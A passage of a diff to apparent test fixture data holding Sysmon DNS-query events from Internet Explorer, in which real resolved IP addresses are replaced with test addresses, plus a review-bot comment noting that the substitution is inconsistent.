Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9834,15 +9735,15 @@ }, "answers": [ { - "data": "156.154.200.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "63.251.88.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9850,7 +9751,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9858,7 +9759,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9866,7 +9767,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9874,7 +9775,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -9883,17 +9784,17 @@ } ], "resolved_ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -9909,24 +9810,23 @@ "aa.agkn.com" ], "ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313867653Z", + "ingested": "2021-12-09T13:49:44.739568200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9990,11 +9890,11 @@ "type": "CNAME" }, { - "data": "172.217.10.134", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10002,7 +9902,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10010,7 +9910,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10018,7 +9918,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -10026,21 +9926,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
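Review bot: The address substitution in the aa.agkn.com record is inconsistent on the new side: the IPv4 gTLD-server answers (192.5.6.30, 192.33.14.30, 192.26.92.30, …) were rewritten to RFC 1918 addresses (192.168.6.30, 192.168.14.30, …), while their AAAA counterparts (2001:503:a83e::2:30, 2001:503:231d::2:30, …) in the same `QueryResults`, `answers` and `resolved_ip` fields are left as real public addresses, so the fixture still carries routable IPs in the records it was meant to scrub. Mapping every public A record to the single address 89.160.20.156 also collapses `related.ip` to one entry (here from two addresses to `"89.160.20.156"`), so the expected output no longer exercises de-duplication of distinct resolved addresses alongside the repeated entries kept in `dns.resolved_ip`; using a few different addresses from the supported test range would keep that coverage. Since `event.ingested` changed alongside the data this file looks like regenerated expected output, so the fix belongs in the test input log, with this file regenerated from it.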
@@ -10056,22 +9956,22 @@ "s0.2mdn.net" ], "ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313869152Z", + "ingested": "2021-12-09T13:49:44.739574100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -10139,17 +10039,17 @@ "type": "CNAME" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -10166,14 +10066,13 @@ "b.scorecardresearch.com" ], "ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313870523Z", + "ingested": "2021-12-09T13:49:44.739580Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -10237,27 +10136,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -10273,16 +10172,13 @@ "edw.edmunds.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313871809Z", + "ingested": "2021-12-09T13:49:44.739585800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.548Z", @@ -10346,12 +10242,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { 
@@ -10367,13 +10263,13 @@ "ocsp.digicert.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313873032Z", + "ingested": "2021-12-09T13:49:44.739591600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10437,23 +10333,23 @@ "type": "CNAME" }, { - "data": "35.167.55.0", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.24.219.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.43.21.209", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.200.225.167", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10461,7 +10357,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -10469,7 +10365,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10478,15 +10374,15 @@ } ], "resolved_ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, 
@@ -10503,22 +10399,19 @@ "pre-usermatch.targeting.unrulymedia.com" ], "ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313874262Z", + "ingested": "2021-12-09T13:49:44.739597500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 